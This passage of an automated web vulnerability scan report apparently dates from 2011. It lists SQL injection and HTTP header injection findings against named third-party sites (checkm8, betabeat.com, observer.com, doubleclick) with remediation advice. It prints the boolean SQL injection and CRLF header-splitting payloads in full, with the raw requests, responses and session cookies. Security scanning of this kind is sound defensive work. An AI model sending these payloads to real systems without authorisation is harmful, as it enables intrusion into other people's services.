29.78. https://servicing.capitalone.com/C1/Themes/TopTabMenu/Images/Marketing/Ban_IPOS.gif
29.79. https://servicing.capitalone.com/C1/Themes/TopTabMenu/images/header_bg.gif
29.80. http://showadsak.pubmatic.com/AdServer/AdServerServlet
29.81. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll
29.82. http://sr2.liveperson.net/hcp/html/mTag.js
29.83. http://switch.atdmt.com/jaction/CODB_IOC_Overview/v3/atz.FB8DCF93533EFDA4
29.84. http://switch.atdmt.com/jaction/CODB_IPOS_OpenAccount/v3/atz.FB8DCF93533EFDA4
29.85. http://switch.atdmt.com/jaction/COF_Sav_Homepage/v3/atz.FB8DCF93533EFDA4
29.86. http://syn.5min.com/handlers/SenseHandler.ashx
29.87. http://trk.etrigue.com/track.php
29.88. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView
29.89. http://web2.checkm8.com/adam/detect
29.90. http://widgets.klout.com/public/scripts/widget_hover.js
29.91. http://wow.curse.com/Themes/Common/CS/images/Common/star-left-off.gif
29.92. http://wow.curse.com/Themes/Common/CS/images/Common/star-left-on.gif
29.93. http://wow.curse.com/Themes/Common/CS/images/Common/star-right-off.gif
29.94. http://wow.curse.com/Themes/Common/CS/images/Common/star-right-on.gif
29.95. http://wow.curse.com/adserver/default.aspx
29.96. http://www.articleonepartners.com/images/favicon.ico
29.97. http://www.articleonepartners.com/images/ipwatchdog.png
29.98. http://www.asp.net/omniture/analyticsid.aspx
29.99. http://www.betabeat.com/wp-admin/admin-ajax.php
29.100. http://www.boston.com/newsprojects/widgets/twitter/get_tweet_count.php
29.101. https://www.capitalone.com/favicon.ico
29.102. http://www.codeplex.com/site/analyticsid.aspx
29.103. http://www.fiddler2.com/fiddler2/updatecheck.asp
29.104. http://www.jackhenry.com/logos/cdd775ef-7b5f-4921-bd1a-c577d8029e28.gif
29.105. http://www.jackhenrybanking.com/images/b7cf526e-2e5f-4898-9d62-3bb61fdd6dcf.gif
29.106. http://www.nmmlaw.com/favicon.ico
29.107. http://www.othersonline.com/favicon.ico
29.108. http://www.seashepherd.org/favicon.ico
29.109. http://www.silverlight.net/omniture/analyticsid
29.110. http://www.silverpop.com/de/images/headers/About_L3.jpg
29.111. http://www.silverpop.com/de/images/headers/Clients_L3.jpg
29.112. http://www.silverpop.com/de/images/headers/Impressum_L3.jpg
29.113. http://www.silverpop.com/de/images/headers/NewsEvents_L3.jpg
29.114. http://www.silverpop.com/de/images/headers/PrivacyLegal_L3.jpg
29.115. http://www.silverpop.com/de/images/headers/Resources_L3.jpg
29.116. http://www.silverpop.com/favicon.ico
29.117. http://www.silverpop.com/global/dropmenu/settings.js
29.118. http://www.silverpop.com/images/headers/Clients_L3.jpg
29.119. http://www.silverpop.com/images/headers/NewsEvents_L3.jpg
29.120. http://www.silverpop.com/images/headers/Partners_L3.jpg
29.121. http://www.silverpop.com/images/headers/Preferences_L3.jpg
29.122. http://www.silverpop.com/images/headers/PrivacyLegal_L3.jpg
29.123. http://www.silverpop.com/images/headers/Resources_L3.jpg
29.124. http://www.silverpop.com/images/headers/Services_L3.jpg
29.125. http://www.silverpop.com/images/headers/Sitemap_L3.jpg
29.126. http://www.silverpop.com/images/home/banners/Dreamforce.jpg
29.127. http://www.silverpop.com/images/home/banners/Lead-Management.jpg
29.128. http://www.silverpop.com/images/roles/banner_B2B-Marketer.jpg
29.129. http://www.silverpop.com/images/roles/banner_Email-Marketer.jpg
29.130. http://www.silverpop.com/images/roles/banner_agencies.jpg
29.131. http://www.silverpop.com/imx/gui_background.jpg
29.132. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp
30. Content type is not specified
30.1. http://ad.yieldmanager.com/st
30.2. http://greatponds.squarespace.com/favicon.ico
30.3. http://media.trafficmp.com/a/js
30.4. http://www.greatpondsma.org/favicon.ico
31. SSL certificate
31.1. https://code.google.com/
31.2. https://domsnitch.googlecode.com/
1. SQL injection
next
There are 5 instances of this issue:
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query. Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application. You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed. Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://web2.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://web2.checkm8.com
Path:
/adam/detect
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adam/detect?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=http://www.scmagazineus.com/&WIDTH=1039&HEIGHT=733&WIDTH_RANGE=WR_D&DATE=01110722&HOUR=15&RES=RS21&ORD=43659126423120664&req=x&pos=004671820390295345&&&id=442705&click=http://ad.doubleclick.net/click%253Bh%253Dv8/3b4c/3/0/%252a/z%253B242418662%253B0-0%253B1%253B37430148%253B1412-640/480%253B42633033/42650820/1%253B%253B%257Esscs%253D%253f&ad_play=&1'%20and%201%3d1--%20 =1 HTTP/1.1 Host: web2.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.scmagazineus.com/
Response 1
HTTP/1.1 200 OK Date: Fri, 22 Jul 2011 20:14:22 GMT Server: Apache P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC" x-internal-server: 192.168.212.17 NY-AD7 Set-cookie: A=d1LS96wDHW31vc9HH6Mca;Path=/; Set-cookie: C=oeMS96wzNNT9cdadapHWOZGc;Path=/;Expires=Thu, 06-Dec-2074 23:47:42 GMT; x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT; Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.web2.checkm8.com Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com x-internal-id: 170777909/1244522061/3644782917/4000817842 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ...
Request 2
GET /adam/detect?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=http://www.scmagazineus.com/&WIDTH=1039&HEIGHT=733&WIDTH_RANGE=WR_D&DATE=01110722&HOUR=15&RES=RS21&ORD=43659126423120664&req=x&pos=004671820390295345&&&id=442705&click=http://ad.doubleclick.net/click%253Bh%253Dv8/3b4c/3/0/%252a/z%253B242418662%253B0-0%253B1%253B37430148%253B1412-640/480%253B42633033/42650820/1%253B%253B%257Esscs%253D%253f&ad_play=&1'%20and%201%3d2--%20 =1 HTTP/1.1 Host: web2.checkm8.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.scmagazineus.com/
Response 2
HTTP/1.1 200 OK Date: Fri, 22 Jul 2011 20:14:22 GMT Server: Apache P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC" x-internal-server: 192.168.212.15 NY-AD5 Set-cookie: C=oeMS96wE8Z4ZcdadapHWOZGc;Path=/;Expires=Thu, 06-Dec-2074 23:47:42 GMT; x-internal-browser: MZ17 Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT; Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.web2.checkm8.com Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com x-internal-id: 152987262/1226731317/3644782917/4000817842 x-internal-selected: x-internal-no-count: ROBOT-OVERLOAD x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE Cache-Control: no-cache, no-store, max-age=0 Vary: Accept-Encoding Content-Length: 3 Connection: close Content-Type: application/javascript ...
1.2. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.betabeat.com
Path:
/wp-content/themes/nyo_tech/images/betabeat.png
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 11107432'%20or%201%3d1--%20 and 11107432'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-content11107432'%20or%201%3d1--%20 /themes/nyo_tech/images/betabeat.png?1309475579 HTTP/1.1 Host: www.betabeat.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw
Response 1
HTTP/1.1 410 Gone Date: Thu, 21 Jul 2011 16:15:03 GMT Server: VoxCAST Content-Length: 460 Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from VoxCAST <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>410 Gone</title> </head><body> <h1>Gone</h1> <p>The requested resource<br />/wp-content11107432' or 1=1-- /themes/nyo_tech/images...[SNIP]... <address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.betabeat.com Port 80</address> </body></html>
Request 2
GET /wp-content11107432'%20or%201%3d2--%20 /themes/nyo_tech/images/betabeat.png?1309475579 HTTP/1.1 Host: www.betabeat.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw
Response 2
HTTP/1.1 410 Gone Date: Thu, 21 Jul 2011 16:15:03 GMT Server: VoxCAST Content-Length: 479 Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from VoxCAST <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>410 Gone</title> </head><body> <h1>Gone</h1> <p>The requested resource<br />/wp-content11107432' or 1=2-- /themes/nyo_tech/images...[SNIP]... <address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.betabeat.com Port 80</address> </body></html>
1.3. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.betabeat.com
Path:
/wp-content/themes/nyo_tech/images/betabeat.png
Issue detail
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-content/themes'%20and%201%3d1--%20 /nyo_tech/images/betabeat.png?1309475579 HTTP/1.1 Host: www.betabeat.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw
Response 1
HTTP/1.1 410 Gone Date: Thu, 21 Jul 2011 16:15:04 GMT Server: VoxCAST Content-Length: 453 Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from VoxCAST <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>410 Gone</title> </head><body> <h1>Gone</h1> <p>The requested resource<br />/wp-content/themes' and 1=1-- /nyo_tech/images/betabe...[SNIP]... <address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.betabeat.com Port 80</address> </body></html>
Request 2
GET /wp-content/themes'%20and%201%3d2--%20 /nyo_tech/images/betabeat.png?1309475579 HTTP/1.1 Host: www.betabeat.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw
Response 2
HTTP/1.1 410 Gone Date: Thu, 21 Jul 2011 16:15:04 GMT Server: VoxCAST Content-Length: 472 Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from VoxCAST <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>410 Gone</title> </head><body> <h1>Gone</h1> <p>The requested resource<br />/wp-content/themes' and 1=2-- /nyo_tech/images/betabe...[SNIP]... <address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.betabeat.com Port 80</address> </body></html>
1.4. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.betabeat.com
Path:
/wp-content/themes/nyo_tech/images/betabeat.png
Issue detail
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 20937989'%20or%201%3d1--%20 and 20937989'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-content/themes/nyo_tech20937989'%20or%201%3d1--%20 /images/betabeat.png?1309475579 HTTP/1.1 Host: www.betabeat.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw
Response 1
HTTP/1.1 410 Gone Date: Thu, 21 Jul 2011 16:15:05 GMT Server: VoxCAST Content-Length: 460 Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from VoxCAST <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>410 Gone</title> </head><body> <h1>Gone</h1> <p>The requested resource<br />/wp-content/themes/nyo_tech20937989' or 1=1-- /images...[SNIP]... <address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.betabeat.com Port 80</address> </body></html>
Request 2
GET /wp-content/themes/nyo_tech20937989'%20or%201%3d2--%20 /images/betabeat.png?1309475579 HTTP/1.1 Host: www.betabeat.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw
Response 2
HTTP/1.1 410 Gone Date: Thu, 21 Jul 2011 16:15:05 GMT Server: VoxCAST Content-Length: 479 Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from VoxCAST <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>410 Gone</title> </head><body> <h1>Gone</h1> <p>The requested resource<br />/wp-content/themes/nyo_tech20937989' or 1=2-- /images...[SNIP]... <address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.betabeat.com Port 80</address> </body></html>
1.5. http://www.observer.com/wp-content/themes/nyo_tech/images/observer.png [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.observer.com
Path:
/wp-content/themes/nyo_tech/images/observer.png
Issue detail
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /wp-content/themes'%20and%201%3d1--%20 /nyo_tech/images/observer.png?1310084808 HTTP/1.1 Host: www.observer.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.observer.com/wp-content/themes/nyo_tech/stylesheets/observer.css Cookie: __gads=ID=5f64fd7a7ab7d5d0:T=1311264759:S=ALNI_Mb3Is20dJdZM1lFiPbSft2ttJqrEQ
Response 1
HTTP/1.1 410 Gone Date: Thu, 21 Jul 2011 16:13:55 GMT Server: VoxCAST Content-Length: 472 Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from VoxCAST <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>410 Gone</title> </head><body> <h1>Gone</h1> <p>The requested resource<br />/wp-content/themes' and 1=1-- /nyo_tech/images/observ...[SNIP]... <address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.observer.com Port 80</address> </body></html>
Request 2
GET /wp-content/themes'%20and%201%3d2--%20 /nyo_tech/images/observer.png?1310084808 HTTP/1.1 Host: www.observer.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.observer.com/wp-content/themes/nyo_tech/stylesheets/observer.css Cookie: __gads=ID=5f64fd7a7ab7d5d0:T=1311264759:S=ALNI_Mb3Is20dJdZM1lFiPbSft2ttJqrEQ
Response 2
HTTP/1.1 410 Gone Date: Thu, 21 Jul 2011 16:13:55 GMT Server: VoxCAST Content-Length: 453 Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from VoxCAST <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>410 Gone</title> </head><body> <h1>Gone</h1> <p>The requested resource<br />/wp-content/themes' and 1=2-- /nyo_tech/images/observ...[SNIP]... <address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.observer.com Port 80</address> </body></html>
2. HTTP header injection
previous
next
There are 4 instances of this issue:
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response. Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
2.1. http://ad.doubleclick.net/ad/x1.aud/capitalone/exclusion [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/ad/x1.aud/capitalone/exclusion
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 857aa%0d%0a08a4076f552 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /857aa%0d%0a08a4076f552 /x1.aud/capitalone/exclusion;sz=1x1;ord=1234567? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646%252522%25253E%25253Ca%25253E91c2cd96a28 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/857aa 08a4076f552 /x1.aud/capitalone/exclusion;sz=1x1;ord=1234567: Date: Fri, 22 Jul 2011 20:31:34 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1>
2.2. http://ad.doubleclick.net/adj/N5762.interclick.com/B5644777.4 [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/N5762.interclick.com/B5644777.4
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 52bf7%0d%0ab0653725eae was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /52bf7%0d%0ab0653725eae /N5762.interclick.com/B5644777.4;sz=728x90;pc=;click=http://a1.interclick.com/icaid/180684/tid/3beaebd4-bdf2-41be-a78d-f9e43cf0a056/click.ic?;ord=634468586978366444? HTTP/1.1 Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=6;sz=728x90;ord=101352252258050 Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/52bf7 b0653725eae /N5762.interclick.com/B5644777.4;sz=728x90;pc=;click=http: //a1.interclick.com/icaid/180684/tid/3beaebd4-bdf2-41be-a78d-f9e43cf0a056/click.ic Date: Thu, 21 Jul 2011 19:32:11 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1>
2.3. http://ad.doubleclick.net/adj/scmag.hmktus/sc [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/scmag.hmktus/sc
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 8bcac%0d%0aa53c51e38c5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /8bcac%0d%0aa53c51e38c5 /scmag.hmktus/sc;log=0;sid=0;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=907953021859604900? HTTP/1.1 Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.scmagazineus.com/ Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8bcac a53c51e38c5 /scmag.hmktus/sc;log=0;sid=0;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=907953021859604900: Date: Fri, 22 Jul 2011 20:15:54 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1>
2.4. http://ad.doubleclick.net/getcamphist [src parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/getcamphist
Issue detail
The value of the src request parameter is copied into the Location response header. The payload b4827%0d%0a1a9ebdf4b81 was submitted in the src parameter. This caused a response containing an injected HTTP header.
Request
